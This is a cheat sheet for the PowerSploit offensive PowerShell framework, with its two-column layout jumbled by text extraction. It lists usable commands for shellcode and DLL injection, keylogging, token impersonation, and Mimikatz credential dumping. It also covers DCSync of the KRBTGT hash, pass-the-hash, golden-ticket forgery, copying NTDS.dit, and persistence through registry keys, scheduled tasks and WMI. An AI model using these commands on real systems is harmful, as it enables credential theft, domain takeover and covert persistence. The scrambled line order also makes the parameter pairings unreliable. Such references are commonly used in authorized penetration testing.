PowerSploit Cheat Sheet Switch, inject shellcode w/o -Force Optional- one or more remote -ComputerName

prompting for confirmation computers to run the script on. "comp1","comp2"

Invoke-WmiCommand executes a PowerShell code on a Custom Mimikatz commands -Command
target computer(s) using WMI as a pure C2 channel. (note: enclose in single quotes) '"CMD1" "CMD2"'
The scriptblock to run on the -Payload { … } Useful custom Invoke-Mimikatz commands:
target(s) Extract MSCache '"token::elevate"
Getting Started Optional- one or more remote -ComputerName hashes "lsadump::cache"
Get PowerSploit: http://bit.ly/28RwLgo computers to run the script "comp1", "comp2" "token::revert"'
PowerSploit Authors: @mattifestation, @obscuresec, on. Export Kerberos '"standard::base64"
@JosephBialek, @harmj0y, @secabstraction, An optional PSCredential -Credential $Cred tickets as base64 "kerberos::list /export"'
@RichLundeen object to use for remote blobs
execution (default=current DCSync the KRBTGT '"lsadump::dcsync
Mimikatz Authors: @gentilkiwi and Vincent LE TOUX
user) hash for /user:krbtgt
Docs: http://powersploit.readthedocs.io/
Exfiltration ‘domain.local’ /domain:domain.local"'
Note: not all PowerSploit functions are covered, and not
Get-GPPPassword will decrypt any found passwords set Spawn a process with '"sekurlsa::pth /user:user
all options for covered functions are covered. PowerView
through Group Policy Preferences. alternate NTLM /domain:domain.local
and PowerUp have their own cheat sheets.
credentials /ntlm:<NTLM>
Get-Keystrokes will log keys pressed (along with the time
CodeExecution /run:cmd.exe"'
and active window) to a file.
Invoke-ReflectivePEInjection will reflectively load a Willy Wonka’s Golden '"kerberos::golden
Path for the output log file, -LogPath <PATH>
DLL/EXE into powershell.exe or a remote process. Ticket Generator /user:<USER>
defailts to $Env:Temp\key.log
A byte array with the -PEBytes @(…) /krbtgt:<NTLM>
The internal (in minutes) to -Timeout <X> /domain:domain.local
PE/DLL to load
capture keystrokes. Default is /sid:<DOMAIN_SID> /ptt"'
Optional- one or more -ComputerName indefinite.
remote computers to run "comp1","comp2" Purge Kerberos tickets '"kerberos::purge"'
Get-TimedScreenshot will take screenshots on an
the script on. Invoke-NinjaCopy can copy locked files from a system by
interval and save them to disk.
Optional arguments to -ExeArgs "Arg1 Arg2…" opening up raw disk access and parsing the NTFS
The folder path to save -LogPath <PATH> structures. This is useful for cloning off things like
pass to the loaded PE
screenshots NTDS.dit and SYSTEM hives.
Optional process name to -ProcName <NAME>
The internal (in seconds) -Interval <X> Full path of the file to -Path
load the PE into
between taking screenshots copy C:\Windows\NTDS\NTDS.dit
Optional process ID to load -ProcId <ID>
the PE into When the script should stop -EndTime HH-MM Local destination to -LocalDestination
running, HH-MM format copy the file to C:\Temp\NTDS.dit
Invoke-Shellcode will inject shellcode into
Invoke-Mimikatz uses Invoke-ReflectivePEInjection to Destination on remote -RemoteDestination
powershell.exe or a remote process. Shellcode should be
inject Mimikatz into memory. By default it will run the server to copy file to C:\Temp\NTDS.dit
in the form of a byte array (e.g. 0xXX,0xXY,.. )
sekurlsa::logonpasswords module.
To convert a raw shellcode file in Bash, run the following: Optional- one or more -ComputerName "comp1",
To update the Mimikatz code, select the remote computers to "comp2"
hexdump -ve '/1 "0x%02x,"' file.bin |sed 's/.$//'
“Second_Release_PowerShell” compile target in the run the script on.
Process ID to inject shellcode into -ProcessID <ID> Mimikatz project, compile for both Win32 and x64,
Byte array of shellcode to inject -Shellcode base64 –w 0 powerkatz.dll, and replace the base64-DLL
@(0xXX,0xXY…) strings in Invoke-Mimikatz.

Version 1.1 - Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
Invoke-TokenManipulation manipulates tokens and is Switch, use a userland -ScheduledTask Recon
roughly equivalent to Incognito. scheduled task Invoke-Portscan is a simple threaded port scanner that
Switch. Enumerate unique -Enumerate Run the schtask after one -OnIdle mimics nmap’s options.
usable tokens minute of idling Hosts to scan, in hostname, -Hosts host1,host2,…
Displays current credentials for -WhoAmI Run the schtask hourly -Daily IP, or CIDR format -Hosts 192.168.1.0/24
the powershell.exe process Run the schtask hourly -Hourly File with host specifications -HostFile .\hosts.txt
Switch. Revert to original token -RevToSelf Run the schtask at the -At HH:MM Comma-separated list of -ExcludeHosts host3,
context specified time hosts to exclude host4
Switch. Show ALL tokens -ShowAll New-ElevatedPersistenceOption builds an elevated Ports to scan -Ports 21,80-100
Create an alternate process with -CreateProcess option set usable by Add-Persistence Scan the X most common -TopPorts <50-1000>
a given token- use with "cmd.exe" Switch, persist via the -Registry ports
Username/ ProcessId/ThreadId CurrentVersion\Run key Exclude ports from scan -ExcludedPorts X,Y
Specify the token to -Username <X> Switch, use a SYSTEM -ScheduledTask
impersonate by username Treat all hosts as online -SkipDiscovery
scheduled task
Specify the token to -ProcessId <Y> Ping scan only (disable port -PingOnly
Switch, use a permanent -PermanentWMI scan)
impersonate by process ID WMI subscription
Specify the token to -ThreadId <Z> Number of threads to use, -Threads <X>
Run the schtask after one -OnIdle defaults to 100
impersonate by thread ID minute of idling
Switch, use if created process -NoUI Timeout (in milliseconds) -Timeout <Y>
Run the schtask hourly -Hourly for each port check
doesn’t need a UI
Run the schtask/registry -AtLogon Number of hosts to -nHosts <Z>
Out-Minidump generates a full-memory minidump of a payload on any user logon
process, similar to procdump.exe with the ‘-ma’ switch. concurrently scan
Run the schtask/WMI sub -Daily Performance options, -T [1-5]
Example: dump memory of all processes to C:\Temp: daily
Get-Process | Out-Minidump -DumpFilePath C:\Temp higher is more aggressive
Run the schtask/WMI sub -At HH:MM Greppable output -GrepOut <file>
The process object to -Process (Get-Process -Id at the specified time
dump memory for, 4293) XML output -XMLOut <file>
passable on the pipeline Run the WMI sub within 5 -AtStartup
min of system boot Readable output -ReadableOut <file>
Path to save the memory -DumpFilePath .\file.dmp All output formats -AllformatsOut <file>
dump to, defaults to Run the schtask at the -At HH:MM
.\processname_id.dmp specified time Suppress console output, -quiet
Add-Persistence adds persistence capabilities to a script. useful for large scans
Persistence
Payload script block -ScriptBlock {…} More Information
New-UserPersistenceOption builds a user-land option
set usable by Add-Persistence Payload file -FilePath .\file.ps1 https://github.com/PowerShellMafia/PowerSploit

Switch, persist via the -Registry Elevated -ElevatedPersistenceOption $X http://www.exploit-monday.com/

CurrentVersion\Run key persistence options https://obscuresecurity.blogspot.com/
Switch, run the registry -AtLogon Userland -UserPersistenceOption $Y https://clymb3r.wordpress.com/
payload on any user logon persistence options http://blog.harmj0y.net/

Version 1.1 - Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.